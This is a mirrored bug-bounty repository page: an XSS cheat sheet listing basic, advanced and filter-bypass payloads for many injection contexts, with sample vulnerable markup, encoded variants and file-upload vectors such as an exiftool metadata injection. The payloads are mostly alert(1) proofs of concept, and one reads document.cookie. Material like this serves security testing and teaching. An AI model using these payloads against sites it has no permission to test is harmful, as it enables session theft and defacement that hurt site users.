mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
6.3 KiB
6.3 KiB
XSS Cheat Sheet (Basic)
Introduction
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
-
Reflected XSS
Attack where the malicious script runs from another website through the web browser
-
Stored XSS
Stored attacks are those where the injected script is permanently stored on the target servers
-
DOM-Based XSS
A type of XSS that has payloads found in the DOM rather than within the HTML code.
Payloads
- Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
- Add ' or " to escape the payload from value of an HTML tag
"><script>alert(1)</script>
'><script>alert(1)</script>
- Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
- After input the payload
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
- Add --> to escape the payload if input lands in HTML comments.
--><script>alert(1)</script>
- Example source code
<!-- REFLECTED_HERE -->
- After input the payload
<!-- --><script>alert(1)</script> -->
- Add when the input inside or between opening/closing tags, tag can be
<a>,<title>,<script>
and any other HTML tags
</tag><script>alert(1)</script>
"></tag><script>alert(1)</script>
- Example source code
<a href="https://target.com/1?status=REFLECTED_HERE">1</a>
- After input the payload
<a href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
- Use when input inside an attribute’s value of an HTML tag but > is filtered
" onmouseover=alert(1)
" autofocus onfocus=alert(1)
- Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
- After input the payload
<input id="keyword" type="text" name="q" value="" onmouseover=alert(1)">
- Use when input inside
<script>
tags
</script><script>alert(1)</script>
- Example source code
<script>
var sitekey = 'REFLECTED_HERE';
</script>
- After input the payload
<script>
var sitekey = '</script><script>alert(1)</script>';
</script>
XSS Cheat Sheet (Advanced)
- Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//
- Example source code
<script>
var sitekey = 'REFLECTED_HERE';
</script>
- After input the payload
<script>
var sitekey = ''-alert(1)-'';
</script>
- Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
\'alert(1)//
- Example source code
<script>
var sitekey = 'REFLECTED_HERE';
</script>
- If we input payload '-alert(1)-' it will be like this
<script>
var sitekey = '\'-alert(1)-\'';
</script>
The quotes are escaped by a backslash so we need to bypass them
- After input the payload
<script>
var sitekey = '\\'alert(1)//';
</script>
- Use when there’s multi reflection in the same line of JS code
/alert(1)//\
/alert(1)}//\
- Example source code
<script>
var a = 'REFLECTED_HERE'; var b = 'REFLECTED_HERE';
</script>
- After input the payload
<script>
var a = '/alert(1)//\'; var b = '/alert(1)//\';
</script>
- Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
'}alert(1);{'
\'}alert(1);{//
- Example source code
<script>
var greeting;
var time = 1;
if (time < 10) {
test = 'REFLECTED_HERE';
}
</script>
- After input the payload
<script>
var test;
var time = 1;
if (time < 10) {
test = ''}alert(1);{'';
}
</script>
Payload number 2 uses when quote escaped by backslash
- Use when input lands inside backticks delimited strings
${alert(1)}
- Example source code
<script>
var dapos = `REFLECTED_HERE`;
</script>
- After input the payload
<script>
var dapos = `${alert(1)}`;
</script>
- Uses when there is multiple reflections on same page. (Double Reflection)
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
- After input the payload
<!DOCTYPE html>
<html>
<body>
'onload=alert(1)><svg/1='
[...]
'onload=alert(1)><svg/1='
</body>
</html>
- Uses when there is multiple reflections on same page. (Triple Reflection)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
- After input the payload
<!DOCTYPE html>
<html>
<body>
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
[...]
*/alert(1)">'onload="/*<svg/1='
</body>
</html>
- XSS in filename (File Upload) Use when uploaded filename is reflected somewhere in target page
"><svg onload=alert(1)>.jpeg
- XSS in metadata (File Upload) Use when uploaded metada is reflected somewhere in target page (using exiftool)
$ exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
- XSS with SVG file (File Upload)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
- XSS via markdown
[Click Me](javascript:alert('1'))
- XSS in XML page
<a:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</a:script>
Add a "-->" to payload if input lands in a comment section
Add a "]]>" if input lands in a CDATA section
XSS Cheat Sheet (Bypass)
- Mixed Case
<Script>alert(document.cookie)</Script>
- Unclosed Tags
<svg onload="alert(1)"
- Uppercase Payloads
<SVG ONLOAD=ALERT(1)>
- Encoded XSS
(Encoded)
%3Csvg%20onload%3Dalert(1)%3E
(Double Encoded)
%253Csvg%2520onload%253Dalert%281%29%253E
(Triple Encoded)
%25253Csvg%252520onload%25253Dalert%25281%2529%25253E
- JS Lowercased Input
<SCRİPT>alert(1)</SCRİPT>
- PHP Email Validation Bypass
<svg/onload=alert(1)>"@gmail.com
- PHP URL Validation Bypass
javascript://%250Aalert(1)
- Inside Comments Bypass
<!--><svg onload=alert(1)-->
Reference: